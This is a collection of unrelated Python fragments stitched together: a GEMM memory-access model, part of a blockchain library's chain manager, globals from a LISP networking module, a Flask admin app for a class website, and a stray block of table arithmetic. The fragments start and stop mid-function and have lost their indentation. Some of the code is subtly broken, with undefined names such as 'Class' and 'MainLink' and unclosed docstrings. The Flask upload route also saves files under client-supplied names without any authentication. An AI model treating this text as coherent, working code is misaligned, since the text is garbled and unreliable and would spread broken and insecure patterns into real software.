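print(len(distinct_orders((4, 4, 8))))   # two equal -> 3 orders
```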
def generateTileSpace(self):
tile_space = []
tiles = [None] * self.num_levels
for level in range(0, self.num_levels-1):
memory = self.memLayer[level]
#tiles[level] = self.getTileDims(memory)
tiles[level] = memory.getTileDims()
if self.num_levels == 1:
tile_space = []
elif self.num_levels == 2:
tile_space = tiles[0]
elif self.num_levels == 3:
tile_space = [(x,y) for x in tiles[0] for y in tiles[1]]
elif self.num_levels == 4:
tile_space = [(x,y,z) for x in tiles[0] for y in tiles[1] for z in tiles[2]]
else:
raise NotImplementedError()
return tile_space
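The per-level if/elif chain in ``generateTileSpace`` is a cartesian product over the candidate tile lists; ``itertools.product`` expresses the same thing for any number of levels. A hypothetical helper preserving the two-level case's bare-element convention:

```python
import itertools

# Sketch of generateTileSpace's cartesian product: one candidate tile per
# memory level below the top; the single-level case keeps bare elements,
# matching the num_levels == 2 branch above.
def tile_space(tiles_per_level):
    if not tiles_per_level:
        return []
    if len(tiles_per_level) == 1:
        return list(tiles_per_level[0])
    return list(itertools.product(*tiles_per_level))
```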
def getTileSize(self, lid):
memory = self.memLayer[lid]
memory.calcTileDim()
tile_dim = memory.getTileDim()
return tile_dim, tile_dim, tile_dim
#Count the number of accesses from level-1 to level
# input matrix A(dim1, dim2) and B(dim2, dim3)
# output matrix C(dim1, dim3)
def getNumAccesses(self, level, dim1, dim2, dim3, tile_dim, num_repeat, name):
#tile1,tile2,tile3 = self.getTileSize(level-1)
tile1, tile2, tile3 = tile_dim
orig_size = tile1*tile2 + tile1*tile3 + tile2*tile3
short_tile_cond = [0,0,0]
if tile1 > dim1:
tile1 = dim1
short_tile_cond[0] = 1
if tile2 > dim2:
tile2 = dim2
short_tile_cond[1] = 1
if tile3 > dim3:
tile3 = dim3
short_tile_cond[2] = 1
if short_tile_cond[2] == 0 and (short_tile_cond[0] | short_tile_cond[1]) == 1:
if level <= 1:
tile3 = math.floor((orig_size - tile1 * tile2) / (tile1 + tile2))
else:
#store bypasses cache, directly goes to memory
tile3 = math.floor((orig_size - tile1 * tile2) / tile2)
if tile3 > dim3:
tile3 = dim3
#Uncomment if tile3 needs to be pow of 2
#tile3 = int(math.pow(2, math.floor(math.log2(tile3))))
elif short_tile_cond[0] == 0 and (short_tile_cond[1] | short_tile_cond[2]) == 1:
if level <= 1:
tile1 = math.floor((orig_size - tile3 * tile2) / (tile3 + tile2))
else:
#store bypasses cache, directly goes to memory
tile1 = math.floor((orig_size - tile3 * tile2) / tile2)
if tile1 > dim1:
tile1 = dim1
elif short_tile_cond[1] == 0 and (short_tile_cond[0] & short_tile_cond[2]) == 1:
if level <= 1:
tile2 = math.floor((orig_size - tile3 * tile1) / (tile3 + tile1))
else:
tile2 = math.floor((orig_size) / (tile1 + tile3))
if tile2 > dim2:
tile2 = dim2
reload_A = 1
reload_B = 1
reload_C = 1
if tile1 > 0 and tile2 > 0 and tile3 > 0:
reload_A = math.ceil(dim3 / tile3)
reload_B = math.ceil(dim1 / tile1)
#do not access the slow memory on every write; accumulate in fast memory
reload_C = (1 if level > 1 else math.ceil(dim2 / tile2))
num_mem = num_repeat * (dim1 * dim2 * reload_A + dim2 * dim3 * reload_B + dim1 * dim3 * reload_C) * self.precision
if self.debug:
print(name)
print("Matrix dimension at Level {}: {:,} x {:,} x {:,}".format(level, dim1, dim2, dim3))
print("Tile dimension at Level {}: {:,} x {:,} x {:,}".format(level-1, tile1, tile2, tile3))
print("reload_A: {}, reload_B: {}, reload_C: {}".format(reload_A, reload_B, reload_C))
print("num_repeat: {}".format(num_repeat))
print("Bytes Accessed: {:,}".format(num_mem))
print("")
return num_mem, tile1, tile2, tile3
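The reload counting above reduces to: A is re-read once per tile pass over dim3, B once per pass over dim1, and C either once (when partial sums accumulate in fast memory) or once per pass over dim2. A self-contained sketch of that rule (``byte_traffic`` is a hypothetical helper):

```python
import math

# Sketch of getNumAccesses' traffic formula for C = A(dim1,dim2) x B(dim2,dim3):
# each operand's bytes are multiplied by how many tile passes re-read it.
def byte_traffic(dim1, dim2, dim3, tile1, tile2, tile3,
                 precision, accumulate_c=True):
    reload_A = math.ceil(dim3 / tile3)
    reload_B = math.ceil(dim1 / tile1)
    reload_C = 1 if accumulate_c else math.ceil(dim2 / tile2)
    return (dim1 * dim2 * reload_A
            + dim2 * dim3 * reload_B
            + dim1 * dim3 * reload_C) * precision
```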
#This is the main function that captures the memory hierarchy impact
#on the number of accesses to global memory considering not everything fits in
#L2 cache and also captures the effect of shared memory
def GEMM(self, order_dims, tile_dims, name):
dim1_ = order_dims[0]
dim2_ = order_dims[1]
dim3_ = order_dims[2]
#dim1 = util.power2RoundUp(dim1_)
#dim2 = util.power2RoundUp(dim2_)
#dim3 = util.power2RoundUp(dim3_)
dim1 = dim1_
dim2 = dim2_
dim3 = dim3_
GEMM_flop = dim1 * dim3 * (2 * dim2 - 1) #dim2 multiplies and dim2-1 adds per output element
#X1 = self.L2_tile_dim
#X2 = self.shared_mem_tile_dim
#X3 = self.reg_tile_dim
num_accesses = [0] * self.num_levels
if (algByte):
num_accesses[self.num_levels - 1] = (dim1 * dim2 + dim2 * dim3 + dim1 * dim3) * self.precision
else:
num_repeat = 1
for level in range(self.num_levels - 1, 0, -1):
num_accesses[level], tile1, tile2, tile3 = self.getNumAccesses(level, dim1, dim2, dim3, tile_dims[level-1], num_repeat, name)
try:
num_repeat *= math.ceil(dim1/tile1) * math.ceil(dim2/tile2) * math.ceil(dim3/tile3)
except ZeroDivisionError:
pass #a zero tile dimension leaves num_repeat unchanged
dim1 = tile1 if tile1 != 0 else dim1
dim2 = tile2 if tile2 != 0 else dim2
dim3 = tile3 if tile3 != 0 else dim3
#Number of accesses to level0 (for every 2N^3 computation, 3N^2 memory accesses happen, where N is the width of the systolic engine)
reuse = 1
dim1 = dim1_
dim2 = dim2_
dim3 = dim3_
if self.dataflow == "none":
reuse = 1
elif self.dataflow == "best":
reuse = max(math.ceil(dim1/self.FMA_width), math.ceil(dim3/self.FMA_width), math.ceil(dim2/self.FMA_width))
elif self.dataflow == "wst": #wt stationary
reuse = math.ceil(dim1/self.FMA_width)
elif self.dataflow == "ast": #act statinary
reuse = math.ceil(dim3/self.FMA_width)
elif self.dataflow == "ost": #output stationary
reuse = math.ceil(dim2/self.FMA_width)
else:
raise NotImplementedError()
#TODO: make sure to model underutilized systolic array
#TODO: support FMA_width_x and FMA_width_y
num_accesses[0] = GEMM_flop * ((2 * reuse + 1) / (2 * reuse)) * 1/self.FMA_width * self.precision
#num_accesses[0] = GEMM_flop * ((2 * reuse + self.FMA_width) / (2 * reuse)) * 1/self.FMA_width * self.precision
#TODO: do we still need these in new hierarchical version?
# if X3 == 0:
# GEMM_smem = GEMM_rmem
# GEMM_rmem = 0
# if X2 == 0:
# GEMM_l2mem = GEMM_smem
# GEMM_smem = 0
# if X1 == 0:
# GEMM_gmem = GEMM_l2mem
# GEMM_l2mem = 0
# try:
# GEMM_l2mem = GEMM_smem
# GEMM_smem = 0
# src/ape/managers/chain.py
import time
from pathlib import Path
from typing import Callable, Dict, Iterator, List, Optional, Tuple, Union
from ethpm_types import ContractType
from ape.api import Address, BlockAPI, ReceiptAPI
from ape.api.address import BaseAddress
from ape.api.networks import LOCAL_NETWORK_NAME, NetworkAPI, ProxyInfoAPI
from ape.api.query import BlockQuery
from ape.exceptions import ChainError, UnknownSnapshotError
from ape.logging import logger
from ape.managers.base import BaseManager
from ape.types import AddressType, BlockID, SnapshotID
from ape.utils import cached_property
class BlockContainer(BaseManager):
"""
A list of blocks on the chain.
Usage example::
from ape import chain
latest_block = chain.blocks[-1]
"""
@property
def head(self) -> BlockAPI:
"""
The latest block.
"""
return self._get_block("latest")
@property
def height(self) -> int:
"""
The latest block number.
"""
if self.head.number is None:
raise ChainError("Latest block has no number.")
return self.head.number
@property
def network_confirmations(self) -> int:
return self.provider.network.required_confirmations
def __getitem__(self, block_number: int) -> BlockAPI:
"""
Get a block by number. Negative numbers start at the chain head and
move backwards. For example, ``-1`` would be the latest block and
``-2`` would be the block prior to that one, and so on.
Args:
block_number (int): The number of the block to get.
Returns:
:class:`~ape.api.providers.BlockAPI`
"""
if block_number < 0:
block_number = len(self) + block_number
return self._get_block(block_number)
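The negative-index handling in ``__getitem__`` follows Python sequence semantics; a sketch of the normalization (``normalize_block_number`` is a hypothetical helper, not part of ape):

```python
# Sketch of BlockContainer.__getitem__'s index handling: negative block
# numbers count back from the chain head, as with Python sequences.
def normalize_block_number(block_number, chain_length):
    if block_number < 0:
        block_number = chain_length + block_number
    return block_number
```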
def __len__(self) -> int:
"""
The number of blocks in the chain.
Returns:
int
"""
return self.height + 1
def __iter__(self) -> Iterator[BlockAPI]:
"""
Iterate over all the current blocks.
Returns:
Iterator[:class:`~ape.api.providers.BlockAPI`]
"""
return self.range(len(self))
def query(
self,
*columns: List[str],
start_block: int = 0,
stop_block: Optional[int] = None,
step: int = 1,
engine_to_use: Optional[str] = None,
) -> Iterator:
"""
A method for querying blocks and returning an Iterator. If you
do not provide a starting block, the 0 block is assumed. If you do not
provide a stopping block, the last block is assumed. You can pass
``engine_to_use`` to short-circuit engine selection.
Raises:
:class:`~ape.exceptions.ChainError`: When ``stop_block`` is greater
than the chain length.
Args:
columns (List[str]): columns in the DataFrame to return
start_block (int): The first block, by number, to include in the
query. Defaults to 0.
stop_block (Optional[int]): The last block, by number, to include
in the query. Defaults to the latest block.
step (int): The number of blocks to iterate between block numbers.
Defaults to ``1``.
engine_to_use (Optional[str]): query engine to use, bypasses query
engine selection algorithm.
Returns:
Iterator
"""
if stop_block is None:
stop_block = self.height
elif stop_block > self.height:
raise ChainError(
f"'stop_block={stop_block}' cannot be greater than the chain length ({len(self)}). "
f"Use '{self.poll_blocks.__name__}()' to wait for future blocks."
)
query = BlockQuery(
columns=columns,
start_block=start_block,
stop_block=stop_block,
step=step,
engine_to_use=engine_to_use,
)
return self.query_manager.query(query)
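``query``'s stop handling defaults to the chain height and rejects anything beyond it; a minimal sketch of that validation (``resolve_stop_block`` is hypothetical and raises ``ValueError`` instead of ape's ``ChainError``):

```python
# Sketch of query()'s stop_block resolution: default to the current height,
# reject stops past the end of the chain.
def resolve_stop_block(stop_block, height):
    if stop_block is None:
        return height
    if stop_block > height:
        raise ValueError(
            f"'stop_block={stop_block}' cannot be greater than the chain height ({height}).")
    return stop_block
```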
def range(
self, start_or_stop: int, stop: Optional[int] = None, step: int = 1
) -> Iterator[BlockAPI]:
"""
Iterate over blocks. Works similarly to python ``range()``.
Raises:
:class:`~ape.exceptions.ChainError`: When ``stop`` is greater
than the chain length.
:class:`~ape.exceptions.ChainError`: When ``stop`` is less
than ``start_block``.
:class:`~ape.exceptions.ChainError`: When ``stop`` is less
than 0.
:class:`~ape.exceptions.ChainError`: When ``start`` is less
than 0.
Args:
start_or_stop (int): When given just a single value, it is the stop.
Otherwise, it is the start. This mimics the behavior of the
built-in Python ``range`` function.
stop (Optional[int]): The block number to stop before. Also the total
number of blocks to get. If not setting a start value, is set by
the first argument.
step (Optional[int]): The value to increment by. Defaults to ``1``.
Returns:
Iterator[:class:`~ape.api.providers.BlockAPI`]
"""
if stop is None:
stop = start_or_stop
start = 0
else:
start = start_or_stop
if stop > len(self):
raise ChainError(
f"'stop={stop}' cannot be greater than the chain length ({len(self)}). "
f"Use '{self.poll_blocks.__name__}()' to wait for future blocks."
)
elif stop < start:
raise ValueError(f"stop '{stop}' cannot be less than start '{start}'.")
elif stop < 0:
raise ValueError(f"stop '{stop}' cannot be negative.")
elif start_or_stop < 0:
raise ValueError(f"start_or_stop '{start_or_stop}' cannot be negative.")
# Note: the range `stop_block` is a non-inclusive stop, while the
# `.query` method uses an inclusive stop, so we must adjust downwards.
results = self.query("*", start_block=start, stop_block=stop - 1, step=step) # type: ignore
for _ in results:
yield _
def poll_blocks(
self,
start: Optional[int] = None,
stop: Optional[int] = None,
required_confirmations: Optional[int] = None,
) -> Iterator[BlockAPI]:
"""
Poll new blocks. Optionally set a start block to include historical blocks.
**NOTE**: This is a daemon method; it does not terminate unless an exception occurs
or a ``stop`` is given.
Usage example::
from ape import chain
for new_block in chain.blocks.poll_blocks():
print(f"New block found: number={new_block.number}")
Args:
start (Optional[int]): The block number to start with. Defaults to the pending
block number.
stop (Optional[int]): Optionally set a future block number to stop at.
Defaults to never-ending.
required_confirmations (Optional[int]): The number of confirmations to wait
    before yielding the block. The more confirmations, the less likely a reorg
    will occur. Defaults to the network's configured required confirmations.
Returns:
Iterator[:class:`~ape.api.providers.BlockAPI`]
"""
if required_confirmations is None:
required_confirmations = self.network_confirmations
if stop is not None and stop <= self.chain_manager.blocks.height:
raise ValueError("'stop' argument must be in the future.")
# Get number of last block with the necessary amount of confirmations.
latest_confirmed_block_number = self.height - required_confirmations
has_yielded = False
if start is not None:
# Front-load historically confirmed blocks.
yield from self.range(start, latest_confirmed_block_number + 1)
has_yielded = True
time.sleep(self.provider.network.block_time)
while True:
confirmable_block_number = self.height - required_confirmations
if confirmable_block_number < latest_confirmed_block_number and has_yielded:
logger.error(
"Chain has reorganized since returning the last block. "
"Try adjusting the required network confirmations."
)
elif confirmable_block_number > latest_confirmed_block_number:
# Yield all missed confirmable blocks
new_blocks_count = confirmable_block_number - latest_confirmed_block_number
for i in range(new_blocks_count):
block_num = latest_confirmed_block_number + i
block = self._get_block(block_num)
yield block
if stop and block.number == stop:
return
has_yielded = True
latest_confirmed_block_number = confirmable_block_number
time.sleep(self.provider.network.block_time)
def _get_block(self, block_id: BlockID) -> BlockAPI:
return self.provider.get_block(block_id)
class AccountHistory(BaseManager):
"""
A container mapping account addresses to the transactions from the active session.
"""
_map: Dict[AddressType, List[ReceiptAPI]] = {}
@cached_property
def _convert(self) -> Callable:
return self.conversion_manager.convert
def __getitem__(self, address: Union[BaseAddress, AddressType, str]) -> List[ReceiptAPI]:
"""
Get the list of transactions from the active session for the given address.
Args:
address (``AddressType``): The sender of the desired transactions.
Returns:
    List[:class:`~ape.api.transactions.ReceiptAPI`]: The list of receipts. If there
    are no recorded transactions, returns an empty list.
"""
address_key: AddressType = self._convert(address, AddressType)
explorer = self.provider.network.explorer
explorer_receipts = (
[r for r in explorer.get_account_transactions(address_key)] if explorer else []
)
for receipt in explorer_receipts:
if receipt.txn_hash not in [r.txn_hash for r in self._map.get(address_key, [])]:
self.append(receipt)
return self._map.get(address_key, [])
def __iter__(self) -> Iterator[AddressType]:
"""
Iterate through the accounts listed in the history map.
Returns:
    Iterator[``AddressType``]
yield from self._map
def items(self) -> Iterator[Tuple[AddressType, List[ReceiptAPI]]]:
"""
Iterate through the mapping of account addresses to their lists of transaction receipts.
Returns:
    Iterator[Tuple[``AddressType``, List[:class:`~ape.api.transactions.ReceiptAPI`]]]
yield from self._map.items()
def append(self, txn_receipt: ReceiptAPI):
"""
Add a transaction to the stored list for the given account address.
Raises:
:class:`~ape.exceptions.ChainError`: When trying to append a transaction
receipt that is already in the list.
Args:
txn_receipt (:class:`~ape.api.transactions.ReceiptAPI`): The transaction receipt.
**NOTE**: The receipt is accessible in the list returned from
:meth:`~ape.managers.chain.AccountHistory.__getitem__`.
"""
address = self._convert(txn_receipt.sender, AddressType)
if address not in self._map:
self._map[address] = [txn_receipt]
return
if txn_receipt.txn_hash in [r.txn_hash for r in self._map[address]]:
raise ChainError(f"Transaction '{txn_receipt.txn_hash}' already known.")
self._map[address].append(txn_receipt)
def revert_to_block(self, block_number: int):
"""
Remove all receipts past the given block number.
Args:
block_number (int): The block number to revert to.
"""
self._map = {
a: [r for r in receipts if r.block_number <= block_number]
for a, receipts in self.items()
}
class ContractCache(BaseManager):
"""
A collection of cached contracts. Contracts can be cached in two ways:
1. An in-memory cache of locally deployed contracts
2. A cache of contracts per network (only permanent networks are stored this way)
When retrieving a contract, if a :class:`~ape.api.explorers.ExplorerAPI` is used,
it will be cached to disk for faster look-up next time.
"""
_local_contracts: Dict[AddressType, ContractType] = {}
_local_proxies: Dict[AddressType, ProxyInfoAPI] = {}
@property
def _network(self) -> NetworkAPI:
return self.provider.network
@property
def _is_live_network(self) -> bool:
return self._network.name != LOCAL_NETWORK_NAME and not
# build/releases/release-0.499/ob/lisp.py
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - <NAME> <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import Queue
import traceback
from Crypto.Cipher import AES
import ecdsa
import json
import commands
import copy
import chacha
import poly1305
from geopy.distance import vincenty
import curve25519
use_chacha = (os.getenv("LISP_USE_CHACHA") != None)
use_poly = (os.getenv("LISP_USE_POLY") != None)

lisp_print_rloc_probe_list = False
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
lisp_map_notify_queue = {}
lisp_map_servers_list = {}
lisp_ddt_map_requestQ = {}
lisp_db_list = []
lisp_group_mapping_list = {}
lisp_map_resolvers_list = {}
lisp_rtr_list = {}
lisp_elp_list = {}
lisp_rle_list = {}
lisp_geo_list = {}
lisp_json_list = {}
lisp_myrlocs = [None, None, None]
lisp_mymacs = {}
lisp_myinterfaces = {}
lisp_iid_to_interface = {}
lisp_multi_tenant_interfaces = []
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
lisp_registered_count = 0
lisp_info_sources_by_address = {}
lisp_info_sources_by_nonce = {}
lisp_crypto_keys_by_nonce = {}
lisp_crypto_keys_by_rloc_encap = {}
lisp_crypto_keys_by_rloc_decap = {}
lisp_data_plane_security = False
lisp_search_decap_keys = True
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
lisp_crypto_ephem_port = None
lisp_pitr = False
lisp_l2_overlay = False
lisp_rloc_probing = False
lisp_rloc_probe_list = {}
lisp_register_all_rtrs = True
lisp_nonce_echoing = False
lisp_nonce_echo_list = {}
lisp_nat_traversal = False
lisp_program_hardware = False
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
lisp_ipc_lock = None
lisp_default_iid = 0
lisp_ms_rtr_list = []
'''
HTML is only at main link text, class log, hw, and additional
TODO
Verify MainLink content
Resource files
(Modify rendering options?)
TODO
Form validation! I need to make sure Dr. Dann doesn't enter any weird html
Verify main link content
Visual
Carousel Item
Angular preview
Force image to be a certain size
'''
#Import useful packages and objects
from flask import render_template, flash, redirect, url_for, request, session, Response, jsonify
from functools import wraps
from datetime import datetime as dt
from calendar import timegm
import time
import json
from os import listdir
import os.path
from app import app, db, bcrypt
from models import Unit, Lesson, CarouselItem, Reference
from config import basedir, ADMIN_USERNAME, ADMIN_PASSWORD
#8 hours, in seconds
PST_OFFSET = 8 * 60 * 60
# #############
# Authorization
# #############
def check_auth(username, password):
"""Checks to see if a username/password combination is valid"""
if username == ADMIN_USERNAME and bcrypt.check_password_hash(ADMIN_PASSWORD, password):
session['authorized'] = True
return True
return False
def authenticate():
"""Sends a 401 response that enables basic auth"""
return Response("Error! Could not verify your access level for that URL. You have to login with proper credentials.",
401, #Response code
{'WWW-Authenticate': 'Basic realm="Login Required"'}) #Headers
def requires_auth(f):
@wraps(f)
def decorated(*args, **kwargs):
auth = request.authorization #Have they validated previously?
if not auth or not check_auth(auth.username, auth.password) or not session.get('authorized'):
return authenticate()
return f(*args, **kwargs)
return decorated
# ##################
# APPLICATION ROUTES
# ##################
@app.route('/')
@app.route('/index/')
def index():
return render_template('app/index.html',
title = 'Home',
carousel_items=CarouselItem.query.all(),
references=Reference.query.all())
@app.route('/loghw/')
def loghw():
seconds_since_epoch = time.time()
current_datetime = dt.utcfromtimestamp(seconds_since_epoch - PST_OFFSET)
current_day_of_week = int(current_datetime.strftime("%w")) #1 is monday
current_week_of_year = int(current_datetime.strftime("%W"))
current_lessons = get_lessons_from_week(current_week_of_year)
# flash("Beyond simple harmonic motion, the class information was copied from last year's schedule. Dr. Dann will have to update it to correspond to this year (e.g. correct days for HIWW, etc). Once he does, this warning message will disappear forever.",category='warning')
return render_template('app/loghw.html',
title='Class Log and HW',
units=Unit.query.filter(Unit.visible).all(),
lessons=current_lessons,
day_of_week=current_day_of_week)
# ##############
# ADMINISTRATIVE
# ##############
@app.route('/admin/')
@requires_auth
def admin():
return render_template('admin/admin.html',
title="Administrator",
units=Unit.query.all(),
lessons=Lesson.query.all(),
items=CarouselItem.query.all(),
references=Reference.query.all())
# Edit the database as JSON
@app.route('/edit/', methods=['GET','POST'])
@requires_auth
def edit():
if request.method == 'GET':
unit_models = Unit.query.all()
class_models = Class.query.all()
carousel_item_models = CarouselItem.query.all()
main_link_models = MainLink.query.all()
#Construct all the JSON maps
content=[unit_model.toJSON() for unit_model in unit_models]
dates=[class_model.pst_datetime.strftime('%m/%d/%y') for class_model in class_models]
carousel_items = [carousel_item_model.toJSON() for carousel_item_model in carousel_item_models]
main_links = [main_link_model.toJSON() for main_link_model in main_link_models]
return render_template('edit.html',
content=formatJSON(content),
carousel_items=formatJSON(carousel_items),
main_links=formatJSON(main_links),
dates=formatJSON(dates),
title="Edit JSON")
else: #POST method
# try: #Todo - better error catching
data = json.loads(request.form['all'])
# for key, value in data.iteritems():
# print key, value
content, dates, carousel_items, main_links = data['content'], data['dates'], data['carousel_items'], data['main_links']
print content, dates, carousel_items, main_links
#Seconds since epoch at which a new PST day w/ physics begins
epoch_day_offsets = [timegm(time.strptime(t, "%m/%d/%y")) for t in dates]
#Zip time info into the topics dictionary
date_iter = iter(epoch_day_offsets)
new_units = []
#Populate the topics into their respective units, with the dates loaded in too
for unit in content:
unit_model = Unit()
unit_model.title=unit['title']
unit_model.description=unit['description']
unit_model.visible = unit['visible']
for cl in unit['classes']:
class_model = Class() #Make an empty model
#Fill it with topical values
for item in cl['items']:
class_model.addItem(item)
class_model.homework=cl['homework']
if 'additional' in cl:
class_model.additional = cl['additional']
#Fill it with time values (could mess up here)
t = date_iter.next() #Seconds since epoch of a new UTC day - could throw an error
pst_dt = dt.utcfromtimestamp(t) #Datetime representing the local date and time
class_model.epoch_time = t + PST_OFFSET #Seconds since epoch of a new PST day
class_model.pst_datetime = pst_dt
class_model.day_of_week = int(pst_dt.strftime("%w")) #1 = Monday, 2 = Tuesday, ..., 5 = Friday
class_model.week_of_year = int(pst_dt.strftime("%W"))
unit_model.addClass(class_model)
new_units.append(unit_model)
new_carousel_items = []
#Add carousel items
for item in carousel_items:
new_item = CarouselItem()
if 'title' in item:
new_item.title=item['title']
if 'description' in item:
new_item.description=item['description']
if 'src' in item:
new_item.src=item['src']
if 'alt' in item:
new_item.alt=item['alt']
new_carousel_items.append(new_item)
new_main_links = []
for link in main_links:
new_link = MainLink()
if 'link' in link:
new_link.link = link['link']
if 'media-type' in link:
new_link.media_type = link['media-type']
new_main_links.append(new_link);
#Now that we have all the models, clear the database and push all the new values on
Unit.query.delete()
Class.query.delete()
CarouselItem.query.delete()
MainLink.query.delete()
for unit_model in new_units:
db.session.add(unit_model)
for carousel_item_model in new_carousel_items:
db.session.add(carousel_item_model)
for main_link_model in new_main_links:
db.session.add(main_link_model)
db.session.commit()
flash('Successfully updated database to reflect changes')
# # except Exception as e:
# print "Error: " + repr(e)
# flash('Uncaught Exception: {0}'.format(e), category='error')
return redirect(url_for('admin'))
@app.route('/getAll/', methods=['GET'])
def getAll():
unit_models = Unit.query.all()
class_models = Class.query.all()
carousel_item_models = CarouselItem.query.all()
main_link_models = MainLink.query.all()
#Construct all the JSON maps
content=[unit_model.toJSON() for unit_model in unit_models]
dates=[class_model.pst_datetime.strftime('%m/%d/%y') for class_model in class_models]
carousel_items = [carousel_item_model.toJSON() for carousel_item_model in carousel_item_models]
main_links = [main_link_model.toJSON() for main_link_model in main_link_models]
out = {}
out['content']=content
out['carousel_items']=carousel_items
out['main_links']=main_links
out['dates']=dates
return json.dumps(out)
@app.route('/help/')
def help():
return render_template('admin/help.html',
title="Help")
# ############
# Upload Files
# ############
@app.route('/upload/', methods=['GET'])
def upload():
return render_template('upload.html')
@app.route('/+upload/', methods=['GET', 'POST'])
def uploadAux():
print request
print request.files
if request.method == 'GET':
# we are expected to return a list of dicts with infos about the already available files:
file_infos = []
for file_name in list_files():
file_url = url_for('download', file_name=file_name)
file_size = get_file_size(file_name)
file_infos.append(dict(name=file_name,
size=file_size,
url=file_url))
return jsonify(files=file_infos)
if request.method == 'POST':
# we are expected to save the uploaded file and return some infos about it:
# vvvvvvvvv this is the name for input type=file
data_file = request.files.get('data_files')
file_name = data_file.filename
save_file(data_file, file_name)
file_size = get_file_size(file_name)
file_url = url_for('download', file_name=file_name)
# providing the thumbnail url is optional
thumbnail_url = url_for('thumbnail', file_name=file_name)
return jsonify(name=file_name,
size=file_size,
url=file_url,
thumbnail=thumbnail_url)
# ###########################
# Edit/Update Model Instances
# ###########################
# Edit a particular Unit
@app.route('/units/edit/<int:unit_id>/', methods=['GET', 'POST'])
@requires_auth
def edit_unit(unit_id):
# Does this unit exist?
unit = Unit.query.get(unit_id)
if not unit:
flash("Unit with ID of `{0}` does not exist.".format(unit_id), category='error')
return redirect(url_for('admin'))
# Edit
if request.method == 'GET':
return render_template('admin/edit_unit.html',
unit=unit)
# Update
else:
f = request.form
if 'title' not in f or 'description' not in f:
    flash("A Unit must contain a title and description. Did not update Unit {0}".format(unit_id), category='error')
return redirect(url_for('admin'))
unit.title = f['title']
unit.description = f['description']
db.session.add(unit)
db.session.commit()
flash("Successfully updated Unit #{0}: {1}".format(unit_id, unit.title), category='message')
return redirect(url_for('admin'))
# Edit a particular Lesson
@app.route('/lessons/edit/<int:lesson_id>/', methods=['GET', 'POST'])
@requires_auth
def edit_lesson(lesson_id):
# Does this lesson exist?
lesson = Lesson.query.get(lesson_id)
if not lesson:
flash("A Lesson with ID of `{0}` does not exist.".format(lesson_id), category='error')
return redirect(url_for('admin'))
# Edit
if request.method == 'GET':
return render_template('admin/edit_lesson.html',
lesson=lesson)
# Update
else:
# All fields can contain HTML, so we need to validate here.
# TODO More efficient method
f = request.form
lesson.clearItems()
items = [f['log1'],f['log2'],f['log3'],f['log4'],f['log5'],f['log6']]
for i in items:
i = i.strip()
# TODO Additional validation
if i != "":
lesson.addItem(i)
lesson.homework = request.form['homework'] # TODO Additional validation
lesson.additional = request.form['additional'] # TODO Additional validation
db.session.add(lesson)
db.session.commit()
flash("Successfully updated Lesson #{0}".format(lesson_id))
return redirect(url_for('admin'))
# Edit a particular CarouselItem
@app.route("/carousel/edit/<int:item_id>", methods=['GET','POST'])
@requires_auth
def edit_carousel(item_id):
# Does this carousel item exist?
item = CarouselItem.query.get(item_id)
if not item:
flash("Carousel Item with ID of `{0}` does not exist.".format(item_id), category='error')
return redirect(url_for('admin'))
# Edit
if request.method == 'GET': #GET method
return render_template('edit_carousel_item.html',
item=item)
# Update
else:
f = request.form
if 'title' not in f or 'description' not in f or 'src' not in f:
flash("A Carousel Item must contain a title, description, and src. Did not update Carousel Item {0}".format(item_id), category='error')
return redirect(url_for('admin'))
item.title = f['title']
item.description = f['description']
item.src = f['src']
item.alt = f.get('alt') # Could be None
db.session.add(item)
db.session.commit()
flash("Successfully updated Carousel Item #{0}: {1}".format(item_id, item.title), category='message')
return redirect(url_for('admin'))
# Edit a particular Reference
@app.route('/references/edit/<int:reference_id>', methods=['GET','POST'])
@requires_auth
def edit_reference(reference_id):
#Does this reference exist?
ref = Reference.query.get(reference_id)
if not ref:
flash("Reference with ID of `{0}` does not exist.".format(reference_id), category='error')
return redirect(url_for('admin'))
# Edit
if request.method == 'GET':
return render_template('admin/edit_reference.html',
ref=ref)
# Update
else:
f = request.form
if 'title' not in f or 'href' not in f or 'media-type' not in f:
flash("References must contain a title, href, and media-type. Did not update Reference {0}".format(reference_id), category='error')
return redirect(url_for('admin'))
ref.title = f['title']
ref.href = f['href'] # TODO Check for bad things here
ref.media_type = f['media-type']
db.session.add(ref)
db.session.commit()
flash("Updated Reference #{0}: `{1}` ({2}) linked to `{3}`".format(reference_id, ref.title, ref.media_type, ref.href), category='message')
return redirect(url_for('admin'))
# ##############
# ERROR HANDLERS
# ##############
@app.errorhandler(404) # 404 = Page Not Found
def not_found_error(error):
return render_template('static/404.html'), 404
@app.errorhandler(500) # 500 = Internal server error
def internal_error(error):
db.session.rollback() # Rollback the database in case a database error triggered the 500
return render_template('static/500.html'), 500
# #############
# MISCELLANEOUS
# #############
@app.route('/tests/')
def tests():
# TODO
c3r7_t1 + c4r7_t1
c5r1_t1_right = r1_t1_bene + c11r1_t1
c5r2_t1_right = r2_t1_bene + c11r2_t1
c5r3_t1_right = r3_t1_bene + c11r3_t1
c5r4_t1_right = r4_t1_bene + c11r4_t1
c5r5_t1_right = r5_t1_bene + c11r5_t1
c5r6_t1_right = r6_t1_bene + c11r6_t1
c5r7_t1_right = r7_t1_bene + c11r7_t1
# Table 2
